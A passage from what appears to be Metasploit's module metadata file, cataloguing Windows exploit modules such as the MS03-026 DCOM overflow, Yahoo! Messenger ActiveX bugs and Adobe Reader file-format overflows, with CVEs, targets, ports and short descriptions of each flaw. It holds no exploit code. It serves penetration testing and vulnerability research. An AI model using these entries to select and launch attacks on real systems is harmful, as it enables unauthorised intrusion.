"path": "/modules/exploits/windows/browser/yahoomessenger_fvcom.rb",
"is_install_path": true,
"ref_name": "windows/browser/yahoomessenger_fvcom",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/yahoomessenger_server": {
"name": "Yahoo! Messenger 8.1.0.249 ActiveX Control Buffer Overflow",
"full_name": "exploit/windows/browser/yahoomessenger_server",
"rank": 400,
"disclosure_date": "2007-06-05",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in the Yahoo! Webcam Upload ActiveX\n Control (ywcupl.dll) provided by Yahoo! Messenger version 8.1.0.249.\n By sending an overly long string to the \"Server()\" method, and then calling\n the \"Send()\" method, an attacker may be able to execute arbitrary code.\n Using the payloads \"windows/shell_bind_tcp\" and \"windows/shell_reverse_tcp\"\n yield for the best results.",
"references": [
"CVE-2007-3147",
"OSVDB-37082"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP0/SP1 Pro English",
"Windows 2000 Pro English All"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/browser/yahoomessenger_server.rb",
"is_install_path": true,
"ref_name": "windows/browser/yahoomessenger_server",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/zenturiprogramchecker_unsafe": {
"name": "Zenturi ProgramChecker ActiveX Control Arbitrary File Download",
"full_name": "exploit/windows/browser/zenturiprogramchecker_unsafe",
"rank": 600,
"disclosure_date": "2007-05-29",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module allows remote attackers to place arbitrary files on a users file system\n via the Zenturi ProgramChecker sasatl.dll (1.5.0.531) ActiveX Control.",
"references": [
"CVE-2007-2987",
"OSVDB-36715",
"BID-24217"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/zenturiprogramchecker_unsafe.rb",
"is_install_path": true,
"ref_name": "windows/browser/zenturiprogramchecker_unsafe",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/zenworks_helplauncher_exec": {
"name": "AdminStudio LaunchHelp.dll ActiveX Arbitrary Code Execution",
"full_name": "exploit/windows/browser/zenworks_helplauncher_exec",
"rank": 300,
"disclosure_date": "2011-10-19",
"type": "exploit",
"author": [
"rgod",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a vulnerability in AdminStudio LaunchHelp.dll ActiveX control. The\n LaunchProcess function found in LaunchHelp.HelpLauncher.1 allows remote attackers to run\n arbitrary commands on the victim machine. This module has been successfully tested with the\n ActiveX installed with AdminStudio 9.5, which also comes with Novell ZENworks Configuration\n Management 10 SP2, on IE 6 and IE 8 over Windows XP SP 3.",
"references": [
"CVE-2011-2657",
"OSVDB-76700",
"BID-50274",
"ZDI-11-318",
"URL-http://www.novell.com/support/viewContent.do?externalId=7009570&sliceId=1"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows Universal"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/zenworks_helplauncher_exec.rb",
"is_install_path": true,
"ref_name": "windows/browser/zenworks_helplauncher_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/dcerpc/ms03_026_dcom": {
"name": "MS03-026 Microsoft RPC DCOM Interface Overflow",
"full_name": "exploit/windows/dcerpc/ms03_026_dcom",
"rank": 500,
"disclosure_date": "2003-07-16",
"type": "exploit",
"author": [
"hdm <x@hdm.io>",
"spoonm <spoonm@no$email.com>",
"cazz <bmc@shmoo.com>"
],
"description": "This module exploits a stack buffer overflow in the RPCSS service, this vulnerability\n was originally found by the Last Stage of Delirium research group and has been\n widely exploited ever since. This module can exploit the English versions of\n Windows NT 4.0 SP3-6a, Windows 2000, Windows XP, and Windows 2003 all in one request :)",
"references": [
"CVE-2003-0352",
"OSVDB-2100",
"MSB-MS03-026",
"BID-8205"
],
"platform": "Windows",
"arch": "",
"rport": 135,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows NT SP3-6a/2000/XP/2003 Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/dcerpc/ms03_026_dcom.rb",
"is_install_path": true,
"ref_name": "windows/dcerpc/ms03_026_dcom",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/dcerpc/ms05_017_msmq": {
"name": "MS05-017 Microsoft Message Queueing Service Path Overflow",
"full_name": "exploit/windows/dcerpc/ms05_017_msmq",
"rank": 400,
"disclosure_date": "2005-04-12",
"type": "exploit",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module exploits a stack buffer overflow in the RPC interface\n to the Microsoft Message Queueing service. The offset to the\n return address changes based on the length of the system\n hostname, so this must be provided via the 'HNAME' option.\n Much thanks to snort.org and Jean-Baptiste Marchand's\n excellent MSRPC website.",
"references": [
"CVE-2005-0059",
"OSVDB-15458",
"MSB-MS05-017",
"BID-13112"
],
"platform": "Windows",
"arch": "",
"rport": 2103,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows 2000 ALL / Windows XP SP0-SP1 (English)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/dcerpc/ms05_017_msmq.rb",
"is_install_path": true,
"ref_name": "windows/dcerpc/ms05_017_msmq",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/dcerpc/ms07_029_msdns_zonename": {
"name": "MS07-029 Microsoft DNS RPC Service extractQuotedChar() Overflow (TCP)",
"full_name": "exploit/windows/dcerpc/ms07_029_msdns_zonename",
"rank": 500,
"disclosure_date": "2007-04-12",
"type": "exploit",
"author": [
"hdm <x@hdm.io>",
"Unknown"
],
"description": "This module exploits a stack buffer overflow in the RPC interface\n of the Microsoft DNS service. The vulnerability is triggered\n when a long zone name parameter is supplied that contains\n escaped octal strings. This module is capable of bypassing NX/DEP\n protection on Windows 2003 SP1/SP2.",
"references": [
"CVE-2007-1748",
"OSVDB-34100",
"MSB-MS07-029",
"URL-http://www.microsoft.com/technet/security/advisory/935964.mspx"
],
"platform": "Windows",
"arch": "",
"rport": 0,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic (2000 SP0-SP4, 2003 SP0, 2003 SP1-SP2)",
"Windows 2000 Server SP0-SP4+ English",
"Windows 2000 Server SP0-SP4+ Italian",
"Windows 2000 Server SP0-SP4+ French",
"Windows 2003 Server SP0 English",
"Windows 2003 Server SP0 French",
"Windows 2003 Server SP1-SP2 English",
"Windows 2003 Server SP1-SP2 French",
"Windows 2003 Server SP1-SP2 Spanish",
"Windows 2003 Server SP1-SP2 Italian",
"Windows 2003 Server SP1-SP2 German"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/dcerpc/ms07_029_msdns_zonename.rb",
"is_install_path": true,
"ref_name": "windows/dcerpc/ms07_029_msdns_zonename",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/dcerpc/ms07_065_msmq": {
"name": "MS07-065 Microsoft Message Queueing Service DNS Name Path Overflow",
"full_name": "exploit/windows/dcerpc/ms07_065_msmq",
"rank": 400,
"disclosure_date": "2007-12-11",
"type": "exploit",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module exploits a stack buffer overflow in the RPC interface\n to the Microsoft Message Queueing service. This exploit requires\n the target system to have been configured with a DNS name and\n for that name to be supplied in the 'DNAME' option. This name does\n not need to be served by a valid DNS server, only configured on\n the target machine.",
"references": [
"CVE-2007-3039",
"OSVDB-39123",
"MSB-MS07-065"
],
"platform": "Windows",
"arch": "",
"rport": 2103,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows 2000 Server English"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/dcerpc/ms07_065_msmq.rb",
"is_install_path": true,
"ref_name": "windows/dcerpc/ms07_065_msmq",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/email/ms07_017_ani_loadimage_chunksize": {
"name": "Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (SMTP)",
"full_name": "exploit/windows/email/ms07_017_ani_loadimage_chunksize",
"rank": 500,
"disclosure_date": "2007-03-28",
"type": "exploit",
"author": [
"hdm <x@hdm.io>",
"skape <mmiller@hick.org>"
],
"description": "This module exploits a buffer overflow vulnerability in the\n LoadAniIcon() function of USER32.dll. The flaw is triggered\n through Outlook Express by using the CURSOR style sheet\n directive to load a malicious .ANI file.\n\n This vulnerability was discovered by Alexander Sotirov of Determina\n and was rediscovered, in the wild, by McAfee.",
"references": [
"MSB-MS07-017",
"CVE-2007-0038",
"CVE-2007-1765",
"OSVDB-33629",
"BID-23194",
"URL-http://www.microsoft.com/technet/security/advisory/935423.mspx"
],
"platform": "Windows",
"arch": "",
"rport": 25,
"autofilter_ports": [
25,
465,
587,
2525,
25025,
25000
],
"autofilter_services": [
"smtp",
"smtps"
],
"targets": [
"Automatic",
"Windows XP SP2 user32.dll 5.1.2600.2622",
"Windows XP SP2 userenv.dll English",
"Windows XP SP2 userenv.dll French",
"Windows XP SP0/SP1 netui2.dll English",
"Windows 2000 SP0-SP4 netui2.dll English",
"Windows Vista user32.dll 6.0.6000.16386",
"Windows XP SP2 user32.dll (5.1.2600.2180) Multi Language",
"Windows XP SP2 user32.dll (5.1.2600.2180) English",
"Windows XP SP2 userenv.dll Portuguese (Brazil)",
"Windows XP SP1a userenv.dll English",
"Windows XP SP1a shell32.dll English"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/email/ms07_017_ani_loadimage_chunksize.rb",
"is_install_path": true,
"ref_name": "windows/email/ms07_017_ani_loadimage_chunksize",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/email/ms10_045_outlook_ref_only": {
"name": "Outlook ATTACH_BY_REF_ONLY File Execution",
"full_name": "exploit/windows/email/ms10_045_outlook_ref_only",
"rank": 600,
"disclosure_date": "2010-06-01",
"type": "exploit",
"author": [
"Yorick Koster <yorick@akitasecurity.nl>"
],
"description": "It has been discovered that certain e-mail message cause Outlook to create Windows\n shortcut-like attachments or messages within Outlook. Through specially crafted TNEF\n streams with certain MAPI attachment properties, it is possible to set a path name\n to files to be executed. When a user double clicks on such an attachment or message,\n Outlook will proceed to execute the file that is set by the path name value. These\n files can be local files, but also files stored remotely (on a file share, for example)\n can be used. Exploitation is limited by the fact that it is not possible for attackers\n to supply command line options.",
"references": [
"MSB-MS10-045",
"CVE-2010-0266",
"OSVDB-66296",
"BID-41446",
"URL-http://www.akitasecurity.nl/advisory.php?id=AK20091001"
],
"platform": "Windows",
"arch": "",
"rport": 25,
"autofilter_ports": [
25,
465,
587,
2525,
25025,
25000
],
"autofilter_services": [
"smtp",
"smtps"
],
"targets": [
"Automatic"
],
"mod_time": "2017-09-22 18:49:09 +0000",
"path": "/modules/exploits/windows/email/ms10_045_outlook_ref_only.rb",
"is_install_path": true,
"ref_name": "windows/email/ms10_045_outlook_ref_only",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/email/ms10_045_outlook_ref_resolve": {
"name": "Outlook ATTACH_BY_REF_RESOLVE File Execution",
"full_name": "exploit/windows/email/ms10_045_outlook_ref_resolve",
"rank": 600,
"disclosure_date": "2010-06-01",
"type": "exploit",
"author": [
"Yorick Koster <yorick@akitasecurity.nl>"
],
"description": "It has been discovered that certain e-mail message cause Outlook to create Windows\n shortcut-like attachments or messages within Outlook. Through specially crafted TNEF\n streams with certain MAPI attachment properties, it is possible to set a path name\n to files to be executed. When a user double clicks on such an attachment or message,\n Outlook will proceed to execute the file that is set by the path name value. These\n files can be local files, but also file stored remotely for example on a file share.\n Exploitation is limited by the fact that its is not possible for attackers to supply\n command line options.",
"references": [
"MSB-MS10-045",
"CVE-2010-0266",
"OSVDB-66296",
"BID-41446",
"URL-http://www.akitasecurity.nl/advisory.php?id=AK20091001"
],
"platform": "Windows",
"arch": "",
"rport": 25,
"autofilter_ports": [
25,
465,
587,
2525,
25025,
25000
],
"autofilter_services": [
"smtp",
"smtps"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/email/ms10_045_outlook_ref_resolve.rb",
"is_install_path": true,
"ref_name": "windows/email/ms10_045_outlook_ref_resolve",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/emc/alphastor_agent": {
"name": "EMC AlphaStor Agent Buffer Overflow",
"full_name": "exploit/windows/emc/alphastor_agent",
"rank": 500,
"disclosure_date": "2008-05-27",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in EMC AlphaStor 3.1.\n By sending a specially crafted message, an attacker may\n be able to execute arbitrary code.",
"references": [
"CVE-2008-2158",
"OSVDB-45714",
"URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=702"
],
"platform": "Windows",
"arch": "",
"rport": 41025,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"EMC AlphaStor 3.1"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/emc/alphastor_agent.rb",
"is_install_path": true,
"ref_name": "windows/emc/alphastor_agent",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/emc/alphastor_device_manager_exec": {
"name": "EMC AlphaStor Device Manager Opcode 0x75 Command Injection",
"full_name": "exploit/windows/emc/alphastor_device_manager_exec",
"rank": 600,
"disclosure_date": "2013-01-18",
"type": "exploit",
"author": [
"Anyway <Aniway.Anyway@gmail.com>",
"Preston Thornburn <prestonthornburg@gmail.com>",
"Mohsan Farid <faridms@gmail.com>",
"Brent Morris <inkrypto@gmail.com>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a flaw within the Device Manager (rrobtd.exe). When parsing the 0x75\n command, the process does not properly filter user supplied input allowing for arbitrary\n command injection. This module has been tested successfully on EMC AlphaStor 4.0 build 116\n with Windows 2003 SP2 and Windows 2008 R2.",
"references": [
"CVE-2013-0928",
"ZDI-13-033"
],
"platform": "Windows",
"arch": "x86",
"rport": 3000,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"EMC AlphaStor 4.0 < build 800 / Windows Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/emc/alphastor_device_manager_exec.rb",
"is_install_path": true,
"ref_name": "windows/emc/alphastor_device_manager_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/emc/networker_format_string": {
"name": "EMC Networker Format String",
"full_name": "exploit/windows/emc/networker_format_string",
"rank": 300,
"disclosure_date": "2012-08-29",
"type": "exploit",
"author": [
"Aaron Portnoy",
"Luigi Auriemma <aluigi@autistici.org>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a format string vulnerability in the lg_sprintf function\n as implemented in liblocal.dll on EMC Networker products. This module exploits the\n vulnerability by using a specially crafted RPC call to the program number 0x5F3DD,\n version 0x02, and procedure 0x06. This module has been tested successfully on EMC\n Networker 7.6 SP3 on Windows XP SP3 and Windows 2003 SP2 (DEP bypass).",
"references": [
"CVE-2012-2288",
"OSVDB-85116",
"BID-55330",
"URL-http://aluigi.altervista.org/misc/aluigi0216_story.txt"
],
"platform": "Windows",
"arch": "",
"rport": 111,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"EMC Networker 7.6 SP3 / Windows Universal",
"EMC Networker 7.6 SP3 / Windows XP SP3",
"EMC Networker 7.6 SP3 / Windows 2003 SP2"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/emc/networker_format_string.rb",
"is_install_path": true,
"ref_name": "windows/emc/networker_format_string",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/emc/replication_manager_exec": {
"name": "EMC Replication Manager Command Execution",
"full_name": "exploit/windows/emc/replication_manager_exec",
"rank": 500,
"disclosure_date": "2011-02-07",
"type": "exploit",
"author": [
"Unknown",
"Davy Douhine"
],
"description": "This module exploits a remote command-injection vulnerability in EMC Replication Manager\n client (irccd.exe). By sending a specially crafted message invoking RunProgram function an\n attacker may be able to execute arbitrary commands with SYSTEM privileges. Affected\n products are EMC Replication Manager < 5.3. This module has been successfully tested\n against EMC Replication Manager 5.2.1 on XP/W2003. EMC Networker Module for Microsoft\n Applications 2.1 and 2.2 may be vulnerable too although this module have not been tested\n against these products.",
"references": [
"CVE-2011-0647",
"OSVDB-70853",
"BID-46235",
"URL-http://www.securityfocus.com/archive/1/516260",
"ZDI-11-061"
],
"platform": "Windows",
"arch": "x86",
"rport": 6542,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"EMC Replication Manager 5.2.1 / Windows Native Payload"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/emc/replication_manager_exec.rb",
"is_install_path": true,
"ref_name": "windows/emc/replication_manager_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/a_pdf_wav_to_mp3": {
"name": "A-PDF WAV to MP3 v1.0.0 Buffer Overflow",
"full_name": "exploit/windows/fileformat/a_pdf_wav_to_mp3",
"rank": 300,
"disclosure_date": "2010-08-17",
"type": "exploit",
"author": [
"d4rk-h4ck3r",
"Dr_IDE",
"dookie"
],
"description": "This module exploits a buffer overflow in A-PDF WAV to MP3 v1.0.0. When\n the application is used to import a specially crafted m3u file, a buffer overflow occurs\n allowing arbitrary code execution.",
"references": [
"OSVDB-67241",
"EDB-14676",
"EDB-14681"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/a_pdf_wav_to_mp3.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/a_pdf_wav_to_mp3",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/abbs_amp_lst": {
"name": "ABBS Audio Media Player .LST Buffer Overflow",
"full_name": "exploit/windows/fileformat/abbs_amp_lst",
"rank": 300,
"disclosure_date": "2013-06-30",
"type": "exploit",
"author": [
"Julian Ahrens",
"modpr0be <modpr0be@spentera.com>"
],
"description": "This module exploits a buffer overflow in ABBS Audio Media Player. The vulnerability\n occurs when adding a specially crafted .lst file, allowing arbitrary code execution with the privileges\n of the user running the application. This module has been tested successfully on\n ABBS Audio Media Player 3.1 over Windows XP SP3 and Windows 7 SP1.",
"references": [
"OSVDB-75096",
"EDB-25204"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"ABBS Audio Media Player 3.1 / Windows XP SP3 / Windows 7 SP1"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/fileformat/abbs_amp_lst.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/abbs_amp_lst",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/acdsee_fotoslate_string": {
"name": "ACDSee FotoSlate PLP File id Parameter Overflow",
"full_name": "exploit/windows/fileformat/acdsee_fotoslate_string",
"rank": 400,
"disclosure_date": "2011-09-12",
"type": "exploit",
"author": [
"Parvez Anwar",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a buffer overflow in ACDSee FotoSlate 4.0 Build 146 via\n a specially crafted id parameter in a String element. When viewing a malicious\n PLP file with the ACDSee FotoSlate product, a remote attacker could overflow a\n buffer and execute arbitrary code. This exploit has been tested on systems such as\n Windows XP SP3, Windows Vista, and Windows 7.",
"references": [
"CVE-2011-2595",
"OSVDB-75425",
"BID-49558"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"ACDSee FotoSlate 4.0 Build 146"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/acdsee_fotoslate_string.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/acdsee_fotoslate_string",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/acdsee_xpm": {
"name": "ACDSee XPM File Section Buffer Overflow",
"full_name": "exploit/windows/fileformat/acdsee_xpm",
"rank": 400,
"disclosure_date": "2007-11-23",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a buffer overflow in ACDSee 9.0.\n When viewing a malicious XPM file with the ACDSee product,\n a remote attacker could overflow a buffer and execute\n arbitrary code.",
"references": [
"CVE-2007-2193",
"OSVDB-35236",
"BID-23620"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"ACDSee 9.0 (Build 1008)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/acdsee_xpm.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/acdsee_xpm",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/actfax_import_users_bof": {
"name": "ActiveFax (ActFax) 4.3 Client Importer Buffer Overflow",
"full_name": "exploit/windows/fileformat/actfax_import_users_bof",
"rank": 300,
"disclosure_date": "2012-08-28",
"type": "exploit",
"author": [
"Craig Freyman",
"Brandon Perry",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a vulnerability in ActiveFax Server. The vulnerability is\n a stack based buffer overflow in the \"Import Users from File\" function, due to the\n insecure usage of strcpy while parsing the csv formatted file. The module creates a\n .exp file that must be imported with ActiveFax Server. It must be imported with the\n default character set 'ECMA-94 / Latin 1 (ISO 8859)'. The module has been tested\n successfully on ActFax Server 4.32 over Windows XP SP3 and Windows 7 SP1. In the\n Windows XP case, when ActFax runs as a service, it will execute as SYSTEM.",
"references": [
"OSVDB-85175",
"EDB-20915",
"URL-http://www.pwnag3.com/2012/08/actfax-local-privilege-escalation.html"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"ActFax 4.32 / Windows XP SP3 EN / Windows 7 SP1"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/actfax_import_users_bof.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/actfax_import_users_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/activepdf_webgrabber": {
"name": "activePDF WebGrabber ActiveX Control Buffer Overflow",
"full_name": "exploit/windows/fileformat/activepdf_webgrabber",
"rank": 100,
"disclosure_date": "2008-08-26",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in activePDF WebGrabber 3.8. When\n sending an overly long string to the GetStatus() method of APWebGrb.ocx (3.8.2.0)\n an attacker may be able to execute arbitrary code. This control is not marked safe\n for scripting, so choose your attack vector accordingly.",
"references": [
"OSVDB-64579",
"URL-http://www.activepdf.com/products/serverproducts/webgrabber/"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/activepdf_webgrabber.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/activepdf_webgrabber",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/adobe_collectemailinfo": {
"name": "Adobe Collab.collectEmailInfo() Buffer Overflow",
"full_name": "exploit/windows/fileformat/adobe_collectemailinfo",
"rank": 400,
"disclosure_date": "2008-02-08",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>",
"Didier Stevens <didier.stevens@gmail.com>"
],
"description": "This module exploits a buffer overflow in Adobe Reader and Adobe Acrobat Professional 8.1.1.\n By creating a specially crafted pdf that a contains malformed Collab.collectEmailInfo() call,\n an attacker may be able to execute arbitrary code.",
"references": [
"CVE-2007-5659",
"OSVDB-41495"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Adobe Reader v8.1.1 (Windows XP SP0-SP3 English)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/adobe_collectemailinfo.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/adobe_collectemailinfo",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/adobe_cooltype_sing": {
"name": "Adobe CoolType SING Table \"uniqueName\" Stack Buffer Overflow",
"full_name": "exploit/windows/fileformat/adobe_cooltype_sing",
"rank": 500,
"disclosure_date": "2010-09-07",
"type": "exploit",
"author": [
"Unknown",
"sn0wfl0w",
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a vulnerability in the Smart INdependent Glyplets (SING) table\n handling within versions 8.2.4 and 9.3.4 of Adobe Reader. Prior versions are\n assumed to be vulnerable as well.",
"references": [
"CVE-2010-2883",
"OSVDB-67849",
"URL-http://contagiodump.blogspot.com/2010/09/cve-david-leadbetters-one-point-lesson.html",
"URL-http://www.adobe.com/support/security/advisories/apsa10-02.html"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/adobe_cooltype_sing.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/adobe_cooltype_sing",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/adobe_flashplayer_button": {
"name": "Adobe Flash Player \"Button\" Remote Code Execution",
"full_name": "exploit/windows/fileformat/adobe_flashplayer_button",
"rank": 300,
"disclosure_date": "2010-10-28",
"type": "exploit",
"author": [
"Unknown",
"Haifei Li",
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a vulnerability in the handling of certain SWF movies\n within versions 9.x and 10.0 of Adobe Flash Player. Adobe Reader and Acrobat\n are also vulnerable, as are any other applications that may embed Flash player.\n\n Arbitrary code execution is achieved by embedding a specially crafted Flash\n movie into a PDF document. An AcroJS heap spray is used in order to ensure\n that the memory used by the invalid pointer issue is controlled.\n\n NOTE: This module uses a similar DEP bypass method to that used within the\n adobe_libtiff module. This method is unlikely to work across various\n Windows versions due to a hardcoded syscall number.",
"references": [
"CVE-2010-3654",
"OSVDB-68932",
"BID-44504",
"URL-http://www.adobe.com/support/security/advisories/apsa10-05.html",
"URL-http://blog.fortinet.com/fuzz-my-life-flash-player-zero-day-vulnerability-cve-2010-3654/",
"URL-http://feliam.wordpress.com/2010/02/11/flash-on-a-pdf-with-minipdf-py/"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/fileformat/adobe_flashplayer_button.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/adobe_flashplayer_button",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/adobe_flashplayer_newfunction": {
"name": "Adobe Flash Player \"newfunction\" Invalid Pointer Use",
"full_name": "exploit/windows/fileformat/adobe_flashplayer_newfunction",
"rank": 300,
"disclosure_date": "2010-06-04",
"type": "exploit",
"author": [
"Unknown",
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a vulnerability in the DoABC tag handling within\n versions 9.x and 10.0 of Adobe Flash Player. Adobe Reader and Acrobat are also\n vulnerable, as are any other applications that may embed Flash player.\n\n Arbitrary code execution is achieved by embedding a specially crafted Flash\n movie into a PDF document. An AcroJS heap spray is used in order to ensure\n that the memory used by the invalid pointer issue is controlled.\n\n NOTE: This module uses a similar DEP bypass method to that used within the\n adobe_libtiff module. This method is unlikely to work across various\n Windows versions due a the hardcoded syscall number.",
"references": [
"CVE-2010-1297",
"OSVDB-65141",
"BID-40586",
"URL-http://www.adobe.com/support/security/advisories/apsa10-01.html",
"URL-http://feliam.wordpress.com/2010/02/11/flash-on-a-pdf-with-minipdf-py/"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/adobe_flashplayer_newfunction.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/adobe_flashplayer_newfunction",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/adobe_flatedecode_predictor02": {
"name": "Adobe FlateDecode Stream Predictor 02 Integer Overflow",
"full_name": "exploit/windows/fileformat/adobe_flatedecode_predictor02",
"rank": 400,
"disclosure_date": "2009-10-08",
"type": "exploit",
"author": [
"unknown",
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits an integer overflow vulnerability in Adobe Reader and Adobe\n Acrobat Professional versions before 9.2.",
"references": [
"CVE-2009-3459",
"BID-36600",
"OSVDB-58729",
"URL-http://blogs.adobe.com/psirt/2009/10/adobe_reader_and_acrobat_issue_1.html",
